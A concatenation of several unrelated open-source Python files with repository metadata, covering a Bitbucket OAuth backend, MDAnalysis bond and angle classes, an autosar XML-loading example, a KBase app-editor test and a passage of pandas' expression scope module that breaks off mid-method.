"""Return the tokens needed to authenticate the access to any API the
service might provide. Bitbucket uses a pair of OAuthToken consisting
on a oauth_token and oauth_token_secret.
instance must be a UserSocialAuth instance.
"""
token = super(BitbucketBackend, cls).tokens(instance)
if token and 'access_token' in token:
token = dict(
tok.split('=')
for tok in token['access_token'].split('&')
)
return token
class BitbucketAuth(ConsumerBasedOAuth):
"""Bitbucket OAuth authentication mechanism"""
AUTHORIZATION_URL = BITBUCKET_AUTHORIZATION_URL
REQUEST_TOKEN_URL = BITBUCKET_REQUEST_TOKEN_URL
ACCESS_TOKEN_URL = BITBUCKET_ACCESS_TOKEN_URL
AUTH_BACKEND = BitbucketBackend
SETTINGS_KEY_NAME = 'BITBUCKET_CONSUMER_KEY'
SETTINGS_SECRET_NAME = 'BITBUCKET_CONSUMER_SECRET'
DEFAULT_SCOPE = ['webhook', 'repository', 'issue']
def user_data(self, access_token):
"""Return user data provided"""
# Bitbucket has a bit of an indirect route to obtain user data from an
# authenticated query: First obtain the user's email via an
# authenticated GET
url = BITBUCKET_EMAIL_DATA_URL
request = self.oauth_request(access_token, url)
response = self.fetch_response(request)
try:
# Then retrieve the user's primary email address or the top email
email_addresses = simplejson.loads(response)
for email_address in reversed(email_addresses):
if email_address['active']:
email = email_address['email']
if email_address['primary']:
break
# Then return the user data using a normal GET with the
# BITBUCKET_USER_DATA_URL and the user's email
response = dsa_urlopen(BITBUCKET_USER_DATA_URL + email)
user_details = simplejson.load(response)['user']
user_details['email'] = email
return user_details
except ValueError:
return None
return None
# Backend definition
BACKENDS = {
'bitbucket': BitbucketAuth,
}
|
looker/sentry
|
src/social_auth/backends/bitbucket.py
|
Python
|
bsd-3-clause
| 4,237
|
# -*- Mode: python; tab-width: 4; indent-tabs-mode:nil; coding:utf-8 -*-
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4
#
# MDAnalysis --- http://www.mdanalysis.org
# Copyright (c) 2006-2016 The MDAnalysis Development Team and contributors
# (see the file AUTHORS for the full list of names)
#
# Released under the GNU Public Licence, v2 or any higher version
#
# Please cite your use of MDAnalysis in published work:
#
# R. J. Gowers, M. Linke, J. Barnoud, T. J. E. Reddy, M. N. Melo, S. L. Seyler,
# D. L. Dotson, J. Domanski, S. Buchoux, I. M. Kenney, and O. Beckstein.
# MDAnalysis: A Python package for the rapid analysis of molecular dynamics
# simulations. In S. Benthall and S. Rostrup editors, Proceedings of the 15th
# Python in Science Conference, pages 102-109, Austin, TX, 2016. SciPy.
#
# N. Michaud-Agrawal, E. J. Denning, T. B. Woolf, and O. Beckstein.
# MDAnalysis: A Toolkit for the Analysis of Molecular Dynamics Simulations.
# J. Comput. Chem. 32 (2011), 2319--2327, doi:10.1002/jcc.21787
#
"""
Core Topology Objects --- :mod:`MDAnalysis.core.topologyobjects`
================================================================
The building blocks for MDAnalysis' description of topology
"""
from __future__ import print_function, absolute_import, division
from six.moves import zip
import numpy as np
import functools
from ..lib.mdamath import norm, dihedral
from ..lib.mdamath import angle as slowang
from ..lib.util import cached
from ..lib import util
from ..lib import distances
@functools.total_ordering
class TopologyObject(object):
"""Base class for all Topology items.
Defines the behaviour by which Bonds/Angles/etc in MDAnalysis should
behave.
.. versionadded:: 0.9.0
.. versionchanged:: 0.10.0
All TopologyObject now keep track of if they were guessed or not
via the ``is_guessed`` managed property.
.. versionadded:: 0.11.0
Added the `value` method to return the size of the object
"""
__slots__ = ("_ix", "_u", "btype", "_bondtype", "_guessed", "order")
def __init__(self, ix, universe, type=None, guessed=False, order=None):
"""Create a topology object
Parameters
----------
ix : numpy array
indices of the Atoms
universe : MDAnalysis.Universe
type : optional
Type of the bond
guessed : optional
If the Bond is guessed
"""
self._ix = ix
self._u = universe
self._bondtype = type
self._guessed = guessed
self.order = order
@property
def atoms(self):
"""Atoms within this Bond"""
return self._u.atoms[self._ix]
@property
def indices(self):
"""Tuple of indices describing this object
.. versionadded:: 0.10.0
"""
return self._ix
@property
def universe(self):
return self._u
@property
def type(self):
"""Type of the bond as a tuple
Note
----
When comparing types, it is important to consider the reverse
of the type too, i.e.::
a.type == b.type or a.type == b.type[::-1]
"""
if self._bondtype is not None:
return self._bondtype
else:
return tuple(self.atoms.types)
@property
def is_guessed(self):
return bool(self._guessed)
def __hash__(self):
return hash((self._u, tuple(self.indices)))
def __repr__(self):
indices = sorted(self.indices)
return "<{cname} between: {conts}>".format(
cname=self.__class__.__name__,
conts=", ".join([
"Atom {0}".format(i)
for i in indices]))
def __contains__(self, other):
"""Check whether an atom is in this :class:`TopologyObject`"""
return other in self.atoms
def __eq__(self, other):
"""Check whether two bonds have identical contents"""
if not self.universe == other.universe:
return False
return (np.array_equal(self.indices, other.indices) or
np.array_equal(self.indices[::-1], other.indices))
def __ne__(self, other):
return not self == other
def __lt__(self, other):
return tuple(self.indices) < tuple(other.indices)
def __getitem__(self, item):
"""Can retrieve a given Atom from within"""
return self.atoms[item]
def __iter__(self):
return iter(self.atoms)
def __len__(self):
return len(self._ix)
class Bond(TopologyObject):
"""A bond between two :class:`~MDAnalysis.core.groups.Atom` instances.
Two :class:`Bond` instances can be compared with the ``==`` and
``!=`` operators. A bond is equal to another if the same atom
numbers are connected and they have the same bond order. The
ordering of the two atom numbers is ignored as is the fact that a
bond was guessed.
The presence of a particular atom can also be queried::
>>> Atom in Bond
will return either ``True`` or ``False``.
.. versionchanged:: 0.9.0
Now a subclass of :class:`TopologyObject`. Changed class to use
:attr:`__slots__` and stores atoms in :attr:`atoms` attribute.
"""
btype = 'bond'
def partner(self, atom):
"""Bond.partner(Atom)
Returns
-------
the other :class:`~MDAnalysis.core.groups.Atom` in this
bond
"""
if atom == self.atoms[0]:
return self.atoms[1]
elif atom == self.atoms[1]:
return self.atoms[0]
else:
raise ValueError("Unrecognised Atom")
def length(self, pbc=False):
"""Length of the bond.
.. versionchanged:: 0.11.0
Added pbc keyword
"""
if pbc:
box = self.universe.dimensions
return distances.self_distance_array(
np.array([self[0].position, self[1].position]),
box=box)[0]
else:
return norm(self[0].position - self[1].position)
value = length
class Angle(TopologyObject):
"""An angle between three :class:`~MDAnalysis.core.groups.Atom` instances.
Atom 2 is the apex of the angle
.. versionadded:: 0.8
.. versionchanged:: 0.9.0
Now a subclass of :class:`TopologyObject`; now uses
:attr:`__slots__` and stores atoms in :attr:`atoms` attribute
"""
btype = 'angle'
def angle(self):
"""Returns the angle in degrees of this Angle.
Angle between atoms 0 and 2 with apex at 1::
2
/
/
1------0
Note
----
The numerical precision is typically not better than
4 decimals (and is only tested to 3 decimals).
.. versionadded:: 0.9.0
"""
a = self[0].position - self[1].position
b = self[2].position - self[1].position
return np.rad2deg(
np.arccos(np.dot(a, b) / (norm(a) * norm(b))))
value = angle
class Dihedral(TopologyObject):
"""Dihedral (dihedral angle) between four
:class:`~MDAnalysis.core.groups.Atom` instances.
The dihedral is defined as the angle between the planes formed by
Atoms (1, 2, 3) and (2, 3, 4).
.. versionadded:: 0.8
.. versionchanged:: 0.9.0
Now a subclass of :class:`TopologyObject`; now uses :attr:`__slots__`
and stores atoms in :attr:`atoms` attribute.
.. versionchanged:: 0.11.0
Renamed to Dihedral (was Torsion)
"""
# http://cbio.bmt.tue.nl/pumma/uploads/Theory/dihedral.png
btype = 'dihedral'
def dihedral(self):
"""Calculate the dihedral angle in degrees.
Dihedral angle around axis connecting atoms 1 and 2 (i.e. the angle
between the planes spanned by atoms (0,1,2) and (1,2,3))::
3
|
1-----2
/
0
Note
----
The numerical precision is typically not better than
4 decimals (and is only tested to 3 decimals).
.. versionadded:: 0.9.0
"""
A, B, C, D = self.atoms
ab = A.position - B.position
bc = B.position - C.position
cd = C.position - D.position
return np.rad2deg(dihedral(ab, bc, cd))
value = dihedral
# subclass Dihedral to inherit dihedral method
class ImproperDihedral(Dihedral):
"""
Improper Dihedral (improper dihedral angle) between four
:class:`~MDAnalysis.core.groups.Atom` instances.
MDAnalysis treats the improper dihedral angle as the angle between
the planes formed by Atoms (1, 2, 3) and (2, 3, 4).
.. warning:: Definitions of Atom ordering in improper dihedrals
can change. Check the definitions here against
your software.
.. versionadded:: 0.9.0
.. versionchanged:: 0.11.0
Renamed to ImproperDihedral (was Improper_Torsion)
"""
# http://cbio.bmt.tue.nl/pumma/uploads/Theory/improper.png
btype = 'improper'
def improper(self):
"""Improper dihedral angle in degrees.
Note
----
The numerical precision is typically not better than
4 decimals (and is only tested to 3 decimals).
"""
return self.dihedral()
class TopologyDict(object):
"""A customised dictionary designed for sorting the bonds, angles and
dihedrals present in a group of atoms.
Usage::
topologydict = TopologyDict(members)
Arguments
---------
*members*
A list of :class:`TopologyObject` instances
Returns
-------
*topologydict*
A specialised dictionary of the topology instances passed to it
TopologyDicts are also built lazily from a :class:`TopologyGroup.topDict`
attribute.
The :class:`TopologyDict` collects all the selected topology type from the
atoms and categorises them according to the types of the atoms within. A
:class:`TopologyGroup` containing all of a given bond type can be made by
querying with the appropriate key. The keys to the :class:`TopologyDict`
are a tuple of the atom types that the bond represents and can be viewed
using the :meth:`keys` method.
For example, from a system containing pure ethanol ::
>>> td = u.bonds.topDict
>>> td.keys()
[('C', 'C'),
('C', 'H'),
('O', 'H'),
('C', 'O')]
>>> td['C', 'O']
< TopologyGroup containing 912 bonds >
.. Note::
The key for a bond is taken from the type attribute of the atoms.
Getting and setting types of bonds is done smartly, so a C-C-H
angle is considered identical to a H-C-C angle.
Duplicate entries are automatically removed upon creation and
combination of different Dicts. This means a bond between atoms
1 and 2 will only ever appear once in a dict despite both atoms 1
and 2 having the bond in their :attr:`bond` attribute.
Two :class:`TopologyDict` instances can be combined using
addition and it will not create any duplicate bonds in the process.
.. versionadded:: 0.8
.. versionchanged:: 0.9.0
Changed initialisation to use a list of :class:`TopologyObject`
instances instead of list of atoms; now used from within
:class:`TopologyGroup` instead of accessed from :class:`AtomGroup`.
"""
def __init__(self, topologygroup):
if not isinstance(topologygroup, TopologyGroup):
raise TypeError("Can only construct from TopologyGroup")
self.dict = dict()
self._u = topologygroup.universe
self.toptype = topologygroup.btype
for b in topologygroup:
btype = b.type
try:
self.dict[btype] += [b]
except KeyError:
self.dict[btype] = [b]
self._removeDupes()
def _removeDupes(self):
"""Sorts through contents and makes sure that there are
no duplicate keys (through type reversal)
"""
newdict = dict()
# Go through all keys, if the reverse of the key exists add this to
# that entry else make a new entry
for k in self.dict:
if not k[::-1] in newdict:
newdict[k] = self.dict[k]
else:
newdict[k[::-1]] += self.dict[k]
self.dict = newdict
@property
def universe(self):
return self._u
def __len__(self):
"""Returns the number of types of bond in the topology dictionary"""
return len(self.dict.keys())
def keys(self):
"""Returns a list of the different types of available bonds"""
return self.dict.keys()
def __iter__(self):
"""Iterator over keys in this dictionary"""
return iter(self.dict)
def __repr__(self):
return "<TopologyDict with {num} unique {type}s>".format(
num=len(self), type=self.toptype)
def __getitem__(self, key):
"""Returns a TopologyGroup matching the criteria if possible,
otherwise returns ``None``
"""
if key in self:
if key in self.dict:
selection = self.dict[key]
else:
selection = self.dict[key[::-1]]
bix = np.vstack([s.indices for s in selection])
return TopologyGroup(bix, self._u, btype=self.toptype)
else:
raise KeyError(key)
def __contains__(self, other):
"""
Returns boolean on whether a given type exists within this dictionary
For topology groups the key (1,2,3) is considered the same as (3,2,1)
"""
return other in self.dict or other[::-1] in self.dict
class TopologyGroup(object):
"""A container for a groups of bonds.
All bonds of a certain types can be retrieved from within the
:class:`TopologyGroup` by querying with a tuple of types::
tg2 = tg.select_bonds([key])
Where *key* describes the desired bond as a tuple of the involved
:class:`~MDAnalysis.core.groups.Atom` types, as defined by the .type Atom
attribute). A list of available keys can be displayed using the
:meth:`types` method.
Alternatively, all the bonds which are in a given
:class:`~MDAnalysis.core.groups.AtomGroup` can be extracted using
:meth:`atomgroup_intersection`::
tg2 = tg.atomgroup_intersection(ag)
This allows the keyword *strict* to be given, which forces all members of
all bonds to be inside the AtomGroup passed to it.
Finally, a TopologyGroup can be sliced similarly to AtomGroups::
tg2 = tg[5:10]
The :meth:`bonds`, :meth:`angles` and :meth:`dihedrals` methods offer
a "shortcut" to the Cython distance calculation functions in
:class:`MDAnalysis.lib.distances`.
TopologyGroups can be combined with TopologyGroups of the same bond
type (ie can combine two angle containing TopologyGroups).
.. versionadded:: 0.8
.. versionchanged:: 0.9.0
Overhauled completely: (1) Added internal :class:`TopologyDict`
accessible by the :attr:`topDict` attribute. (2)
:meth:`selectBonds` allows the :attr:`topDict` to be queried
with tuple of types. (3) Added :meth:`atomgroup_intersection`
to allow bonds which are in a given :class:`AtomGroup` to be retrieved.
.. versionchanged:: 0.10.0
Added :func:`from_indices` constructor, allowing class to be created
from indices.
Can now create empty Group.
Renamed :meth:`dump_contents` to :meth:`to_indices`
.. versionchanged:: 0.11.0
Added `values` method to return the size of each object in this group
Deprecated selectBonds method in favour of select_bonds
"""
_allowed_types = {'bond', 'angle', 'dihedral', 'improper'}
def __init__(self, bondidx, universe, btype=None, type=None, guessed=None,
order=None):
if btype is None:
# guess what I am
# difference between dihedral and improper
# not really important
self.btype = {2: 'bond',
3: 'angle',
4: 'dihedral'}[len(bondidx[0])]
elif btype in self._allowed_types:
self.btype = btype
else:
raise ValueError("Unsupported btype, use one of {}"
"".format(self._allowed_types))
nbonds = len(bondidx)
# remove duplicate bonds
if type is None:
type = np.repeat(None, nbonds).reshape(nbonds, 1)
if guessed is None:
guessed = np.repeat(True, nbonds).reshape(nbonds, 1)
elif guessed is True or guessed is False:
guessed = np.repeat(guessed, nbonds).reshape(nbonds, 1)
else:
guessed = np.asarray(guessed, dtype=np.bool).reshape(nbonds, 1)
if order is None:
order = np.repeat(None, nbonds).reshape(nbonds, 1)
# TODO: why has this been defined?
split_index = {'bond': 2,
'angle': 3,
'dihedral': 4,
'improper': 4}[self.btype]
if nbonds > 0:
uniq, uniq_idx = util.unique_rows(bondidx, return_index=True)
self._bix = uniq
self._bondtypes = type[uniq_idx]
self._guessed = guessed[uniq_idx]
self._order = order[uniq_idx]
# Create vertical AtomGroups
self._ags = [universe.atoms[self._bix[:, i]]
for i in range(self._bix.shape[1])]
else:
# Empty TopologyGroup
self._bix = np.array([])
self._bondtypes = np.array([])
self._guessed = np.array([])
self._order = np.array([])
self._ags = []
self._u = universe
self._cache = dict() # used for topdict saving
@property
def universe(self):
"""The Universe that we belong to"""
return self._u
def select_bonds(self, selection):
"""Retrieves a selection from this topology group based on types.
.. seeAlso :meth:`types`
.. versionadded 0.9.0
"""
return self.topDict[selection]
selectBonds = select_bonds
def types(self):
"""Return a list of the bond types in this TopologyGroup
.. versionadded 0.9.0
"""
return list(self.topDict.keys())
@property
@cached('dict')
def topDict(self):
"""
Returns the TopologyDict for this topology group.
This is used for the select_bonds method when fetching a certain type
of bond.
This is a cached property so will be generated the first time it is
accessed.
.. versionadded 0.9.0
"""
return TopologyDict(self)
def atomgroup_intersection(self, ag, **kwargs):
"""Retrieve all bonds from within this TopologyGroup that are within
the AtomGroup which is passed.
Parameters
----------
ag : AtomGroup
The `:class:~MDAnalysis.core.groups.AtomGroup` to intersect
with.
strict : bool
Only retrieve bonds which are completely contained within the
AtomGroup. [``False``]
.. versionadded:: 0.9.0
"""
# Issue #780 - if self is empty, return self to avoid invalid mask
if not self:
return self
# Strict requires all items in a row to be seen,
# otherwise any item in a row
func = np.all if kwargs.get('strict', False) else np.any
atom_idx = ag.indices
# Create a list of boolean arrays,
# each representing a column of bond indices.
seen = [np.in1d(col, atom_idx) for col in self._bix.T]
# Create final boolean mask by summing across rows
mask = func(seen, axis=0)
return self[mask]
@property
def indices(self):
"""all bond indices
See Also
--------
to_indices : function that just returns `indices`
"""
return self._bix
def to_indices(self):
"""Return a data structure with atom indices describing the bonds.
This format should be identical to the original contents of the
entries in universe._topology.
Note that because bonds are sorted as they are initialised, the order
that atoms are defined in each entry might be reversed.
Returns
-------
indices : tuple
A tuple of tuples which define the contents of this
TopologyGroup in terms of the atom numbers. (0 based
index within u.atoms)
.. versionadded:: 0.9.0
.. versionchanged:: 0.10.0
Renamed from "dump_contents" to "to_indices"
"""
return self.indices
dump_contents = to_indices
def __len__(self):
"""Number of bonds in the topology group"""
return self._bix.shape[0]
def __add__(self, other):
"""Combine two TopologyGroups together.
Can combined two TopologyGroup of the same type, or add a single
TopologyObject to a TopologyGroup.
"""
# check addition is sane
if not isinstance(other, (TopologyObject, TopologyGroup)):
raise TypeError("Can only combine TopologyObject or "
"TopologyGroup to TopologyGroup, not {0}"
"".format(type(other)))
# cases where either other or self is empty TG
if not other: # adding empty TG to me
return self
if not self:
if isinstance(other, TopologyObject):
# Reshape indices to be 2d array
return TopologyGroup(other.indices[None, :],
other.universe,
btype=other.btype,
type=np.array([other._bondtype]),
guessed=np.array([other.is_guessed]),
order=np.array([other.order]),
)
else:
return TopologyGroup(other.indices,
other.universe,
btype=other.btype,
type=other._bondtypes,
guessed=other._guessed,
order=other._order,
)
else:
if not other.btype == self.btype:
raise TypeError("Cannot add different types of "
"TopologyObjects together")
if isinstance(other, TopologyObject):
# add TO to me
return TopologyGroup(
np.concatenate([self.indices, other.indices[None, :]]),
self.universe,
btype=self.btype,
type=np.concatenate([self._bondtypes,
np.array([other._bondtype])]),
guessed=np.concatenate([self._guessed,
np.array([[other.is_guessed]])]),
order=np.concatenate([self._order,
np.array([other.order])]),
)
else:
# add TG to me
return TopologyGroup(
np.concatenate([self.indices, other.indices]),
self.universe,
btype=self.btype,
type=np.concatenate([self._bondtypes, other._bondtypes]),
guessed=np.concatenate([self._guessed, other._guessed]),
order=np.concatenate([self._order, other._order]),
)
def __getitem__(self, item):
"""Returns a particular bond as single object or a subset of
this TopologyGroup as another TopologyGroup
.. versionchanged:: 0.10.0
Allows indexing via boolean numpy array
"""
# Grab a single Item, similar to Atom/AtomGroup relationship
if isinstance(item, int):
outclass = {'bond': Bond,
'angle': Angle,
'dihedral': Dihedral,
'improper': ImproperDihedral}[self.btype]
return outclass(self._bix[item],
self._u,
type=self._bondtypes[item],
guessed=self._guessed[item],
order=self._order[item])
else:
# Slice my index array with the item
return self.__class__(self._bix[item],
self._u,
btype=self.btype,
type=self._bondtypes[item],
guessed=self._guessed[item],
order=self._order[item],)
def __contains__(self, item):
"""Tests if this TopologyGroup contains a bond"""
return item.indices in self._bix
def __repr__(self):
return "<TopologyGroup containing {num} {type}s>".format(
num=len(self), type=self.btype)
def __eq__(self, other):
"""Test if contents of TopologyGroups are equal"""
return np.array_equal(self.indices, other.indices)
def __ne__(self, other):
return not self == other
def __nonzero__(self):
return not len(self) == 0
@property
def atom1(self):
"""The first atom in each TopologyObject in this Group"""
return self._ags[0]
@property
def atom2(self):
"""The second atom in each TopologyObject in this Group"""
return self._ags[1]
@property
def atom3(self):
"""The third atom in each TopologyObject in this Group"""
try:
return self._ags[2]
except IndexError:
nvert = {'bond': 2,
'angle': 3,
'dihedral': 4,
'improper': 4}[self.btype]
raise IndexError("TopologyGroup of {}s only has {} vertical AtomGroups"
"".format(self.btype, nvert))
@property
def atom4(self):
"""The fourth atom in each TopologyObject in this Group"""
try:
return self._ags[3]
except IndexError:
nvert = {'bond': 2,
'angle': 3,
'dihedral': 4,
'improper': 4}[self.btype]
raise IndexError("TopologyGroup of {}s only has {} vertical AtomGroups"
"".format(self.btype, nvert))
# Distance calculation methods below
# "Slow" versions exist as a way of testing the Cython implementations
def values(self, **kwargs):
"""Return the size of each object in this Group
:Keywords:
*pbc*
apply periodic boundary conditions when calculating distance
[``False``]
*result*
allows a predefined results array to be used,
note that this will be overwritten
.. versionadded:: 0.11.0
"""
if self.btype == 'bond':
return self.bonds(**kwargs)
elif self.btype == 'angle':
return self.angles(**kwargs)
elif self.btype == 'dihedral':
return self.dihedrals(**kwargs)
elif self.btype == 'improper':
return self.dihedrals(**kwargs)
def _bondsSlow(self, pbc=False): # pragma: no cover
"""Slow version of bond (numpy implementation)"""
if not self.btype == 'bond':
return TypeError("TopologyGroup is not of type 'bond'")
else:
bond_dist = self._ags[0].positions - self._ags[1].positions
if pbc:
box = self._ags[0].dimensions
# orthogonal and divide by zero check
if (box[6:9] == 90.).all() and not (box[0:3] == 0).any():
bond_dist -= np.rint(bond_dist / box[0:3]) * box[0:3]
else:
raise ValueError("Only orthogonal boxes supported")
return np.array([norm(a) for a in bond_dist])
def bonds(self, pbc=False, result=None):
"""Calculates the distance between all bonds in this TopologyGroup
:Keywords:
*pbc*
apply periodic boundary conditions when calculating distance
[False]
*result*
allows a predefined results array to be used,
note that this will be overwritten
Uses cython implementation
"""
if not self.btype == 'bond':
raise TypeError("TopologyGroup is not of type 'bond'")
if not result:
result = np.zeros(len(self), np.float64)
if pbc:
return distances.calc_bonds(self._ags[0].positions,
self._ags[1].positions,
box=self._ags[0].dimensions,
result=result)
else:
return distances.calc_bonds(self._ags[0].positions,
self._ags[1].positions,
result=result)
def _anglesSlow(self): # pragma: no cover
"""Slow version of angle (numpy implementation)"""
if not self.btype == 'angle':
raise TypeError("TopologyGroup is not of type 'angle'")
vec1 = self._ags[0].positions - self._ags[1].positions
vec2 = self._ags[2].positions - self._ags[1].positions
angles = np.array([slowang(a, b) for a, b in zip(vec1, vec2)])
return angles
def angles(self, result=None, pbc=False):
"""Calculates the angle in radians formed between a bond
between atoms 1 and 2 and a bond between atoms 2 & 3
Parameters
----------
result : array_like
allows a predefined results array to be used, note that this
will be overwritten
pbc : bool
apply periodic boundary conditions when calculating angles
[``False``] this is important when connecting vectors between
atoms might require minimum image convention
Returns
-------
angles : ndarray
.. versionchanged :: 0.9.0
Added *pbc* option (default ``False``)
"""
if not self.btype == 'angle':
raise TypeError("TopologyGroup is not of type 'angle'")
if not result:
result = np.zeros(len(self), np.float64)
if pbc:
return distances.calc_angles(self._ags[0].positions,
self._ags[1].positions,
self._ags[2].positions,
box=self._ags[0].dimensions,
result=result)
else:
return distances.calc_angles(self._ags[0].positions,
self._ags[1].positions,
self._ags[2].positions,
result=result)
def _dihedralsSlow(self): # pragma: no cover
"""Slow version of dihedral (numpy implementation)"""
if self.btype not in ['dihedral', 'improper']:
raise TypeError("TopologyGroup is not of type 'dihedral' or "
"'improper'")
vec1 = self._ags[1].positions - self._ags[0].positions
vec2 = self._ags[2].positions - self._ags[1].positions
vec3 = self._ags[3].positions - self._ags[2].positions
return np.array([dihedral(a, b, c)
for a, b, c in zip(vec1, vec2, vec3)])
def dihedrals(self, result=None, pbc=False):
"""Calculate the dihedralal angle in radians for this topology
group.
Defined as the angle between a plane formed by atoms 1, 2 and
3 and a plane formed by atoms 2, 3 and 4.
Parameters
----------
result : array_like
allows a predefined results array to be used, note that this
will be overwritten
pbc : bool
apply periodic boundary conditions when calculating angles
[``False``] this is important when connecting vectors between
atoms might require minimum image convention
Returns
-------
angles : ndarray
.. versionchanged:: 0.9.0
Added *pbc* option (default ``False``)
"""
if self.btype not in ['dihedral', 'improper']:
raise TypeError("TopologyGroup is not of type 'dihedral' or "
"'improper'")
if not result:
result = np.zeros(len(self), np.float64)
if pbc:
return distances.calc_dihedrals(self._ags[0].positions,
self._ags[1].positions,
self._ags[2].positions,
self._ags[3].positions,
box=self._ags[0].dimensions,
result=result)
else:
return distances.calc_dihedrals(self._ags[0].positions,
self._ags[1].positions,
self._ags[2].positions,
self._ags[3].positions,
result=result)
|
kain88-de/mdanalysis
|
package/MDAnalysis/core/topologyobjects.py
|
Python
|
gpl-2.0
| 33,789
|
import autosar
ws = autosar.workspace(version="4.2.2")
ws.loadXML('DataTypes.arxml', roles = {
'/DataTypes': 'DataType',
'/DataTypes/CompuMethods': 'CompuMethod',
'/DataTypes/Units': 'Unit',
'/DataTypes/DataConstrs': 'DataConstraint'})
print(ws.roles)
|
cogu/autosar
|
doc/autosar4_guide/examples/setting_roles_on_load_xml.py
|
Python
|
mit
| 276
|
"""
Some tests for the App Editor module.
"""
import unittest
from biokbase.narrative.appeditor import (
generate_app_cell
)
import json
from util import TestConfig
class AppEditorTestCase(unittest.TestCase):
@classmethod
def setUpClass(self):
config = TestConfig()
self.specs_list = config.load_json_file(config.get('specs', 'app_specs_file'))
self.spec_json = config.load_json_file(config.get('specs', 'simple_spec_json'))
with open(config.file_path(config.get('specs', 'simple_display_yaml'))) as f:
self.display_yaml = f.read()
f.close()
def test_gen_app_cell_post_validation(self):
js = generate_app_cell(validated_spec=self.specs_list[0])
self.assertIsNotNone(js)
def test_gen_app_cell_pre_valid(self):
js = generate_app_cell(spec_tuple=(json.dumps(self.spec_json), self.display_yaml))
self.assertIsNotNone(js)
def test_gen_app_cell_fail_validation(self):
with self.assertRaises(Exception):
generate_app_cell(spec_tuple=("{}", self.display_yaml))
|
jmchandonia/narrative
|
src/biokbase/narrative/tests/test_appeditor.py
|
Python
|
mit
| 1,090
|
"""
Module for scope operations
"""
import datetime
import inspect
import itertools
import pprint
import struct
import sys
import numpy as np
from pandas._libs.tslibs import Timestamp
from pandas.compat import DeepChainMap, StringIO, map
from pandas.core.base import StringMixin
import pandas.core.computation as compu
def _ensure_scope(level, global_dict=None, local_dict=None, resolvers=(),
target=None, **kwargs):
"""Ensure that we are grabbing the correct scope."""
return Scope(level + 1, global_dict=global_dict, local_dict=local_dict,
resolvers=resolvers, target=target)
def _replacer(x):
"""Replace a number with its hexadecimal representation. Used to tag
temporary variables with their calling scope's id.
"""
# get the hex repr of the binary char and remove 0x and pad by pad_size
# zeros
try:
hexin = ord(x)
except TypeError:
# bytes literals masquerade as ints when iterating in py3
hexin = x
return hex(hexin)
def _raw_hex_id(obj):
"""Return the padded hexadecimal id of ``obj``."""
# interpret as a pointer since that's what really what id returns
packed = struct.pack('@P', id(obj))
return ''.join(map(_replacer, packed))
_DEFAULT_GLOBALS = {
'Timestamp': Timestamp,
'datetime': datetime.datetime,
'True': True,
'False': False,
'list': list,
'tuple': tuple,
'inf': np.inf,
'Inf': np.inf,
}
def _get_pretty_string(obj):
"""Return a prettier version of obj
Parameters
----------
obj : object
Object to pretty print
Returns
-------
s : str
Pretty print object repr
"""
sio = StringIO()
pprint.pprint(obj, stream=sio)
return sio.getvalue()
class Scope(StringMixin):
"""Object to hold scope, with a few bells to deal with some custom syntax
and contexts added by pandas.
Parameters
----------
level : int
global_dict : dict or None, optional, default None
local_dict : dict or Scope or None, optional, default None
resolvers : list-like or None, optional, default None
target : object
Attributes
----------
level : int
scope : DeepChainMap
target : object
temps : dict
"""
__slots__ = 'level', 'scope', 'target', 'temps'
def __init__(self, level, global_dict=None, local_dict=None, resolvers=(),
target=None):
self.level = level + 1
# shallow copy because we don't want to keep filling this up with what
# was there before if there are multiple calls to Scope/_ensure_scope
self.scope = DeepChainMap(_DEFAULT_GLOBALS.copy())
self.target = target
if isinstance(local_dict, Scope):
self.scope.update(local_dict.scope)
if local_dict.target is not None:
self.target = local_dict.target
self.update(local_dict.level)
frame = sys._getframe(self.level)
try:
# shallow copy here because we don't want to replace what's in
# scope when we align terms (alignment accesses the underlying
# numpy array of pandas objects)
self.scope = self.scope.new_child((global_dict or
frame.f_globals).copy())
if not isinstance(local_dict, Scope):
self.scope = self.scope.new_child((local_dict or
frame.f_locals).copy())
finally:
del frame
# assumes that resolvers are going from outermost scope to inner
if isinstance(local_dict, Scope):
resolvers += tuple(local_dict.resolvers.maps)
self.resolvers = DeepChainMap(*resolvers)
self.temps = {}
def __unicode__(self):
scope_keys = _get_pretty_string(list(self.scope.keys()))
res_keys = _get_pretty_string(list(self.resolvers.keys()))
unicode_str = '{name}(scope={scope_keys}, resolvers={res_keys})'
return unicode_str.format(name=type(self).__name__,
scope_keys=scope_keys,
res_keys=res_keys)
@property
def has_resolvers(self):
"""Return whether we have any extra scope.
For example, DataFrames pass Their columns as resolvers during calls to
``DataFrame.eval()`` and ``DataFrame.query()``.
Returns
-------
hr : bool
"""
return bool(len(self.resolvers))
def resolve(self, key, is_local):
"""Resolve a variable name in a possibly local context
Parameters
----------
key : text_type
A variable name
is_local : bool
Flag indicating whether the variable is local or not (prefixed with
the '@' symbol)
Returns
-------
value : object
The value of a particular variable
"""
try:
# only look for locals in outer scope
if is_local:
return self.scope[key]
# not a local variable so check in resolvers if we have them
if self.has_resolvers:
return self.resolvers[key]
# if we're here that means that we have no locals and we also have
# no resolvers
assert not is_local and not self.has_resolvers
return self.scope[key]
except KeyError:
try:
# last ditch effort we look in temporaries
# these are created when parsing indexing expressions
# e.g., df[df > 0]
return self.temps[key]
except KeyError:
raise compu.ops.UndefinedVariableError(key, is_local)
def swapkey(self, old_key, new_key, new_value=None):
"""Replace a variable name, with a potentially new value.
Parameters
----------
old_key : str
Current variable name to replace
new_key : str
New variable name to replace `old_key` with
new_value : object
Value to be replaced along with the possible renaming
"""
if self.has_resolvers:
maps = self.resolvers.maps + self.scope.maps
else:
maps = self.scope.maps
maps.append(self.temps)
for mapping in maps:
if old_key in mapping:
mapping[new_key] = new_value
return
def _get_vars(self, stack, scopes):
"""Get specifically scoped variables from a list of stack frames.
Parameters
----------
stack : list
A list of stack frames as returned by ``inspect.stack()``
scopes : sequence of strings
A sequence containing valid stack frame attribute names that
evaluate to a dictionary. For example, ('locals', 'globals')
"""
variables = itertools.product(scopes, stack)
for scope, (frame, _, _, _, _, _) in variables:
try:
d = getattr(frame, 'f_' + scope)
self.scope = self.scope.new_child(d)
finally:
# won't remove it, but DECREF it
# in Py3 this probably isn't necessary since frame won't be
# scope after the loop
del frame
def update(self, level):
"""Update the current scope by going back `level` levels.
Parameters
----------
level : int or None, optional, default None
"""
sl = level + 1
# add sl frames to the scope starting with the
# most distant and overwriting with more current
# makes sure that we can capture variable scope
stack = inspect.stack()
try:
self._get_vars(stack[:sl], scopes=['locals'])
finally:
del stack[:], stack
def add_tmp(self, value):
"""Add a temporary variable to the scope.
Parameters
----------
value : object
An arbitrary object to be assigned to a temporary variable.
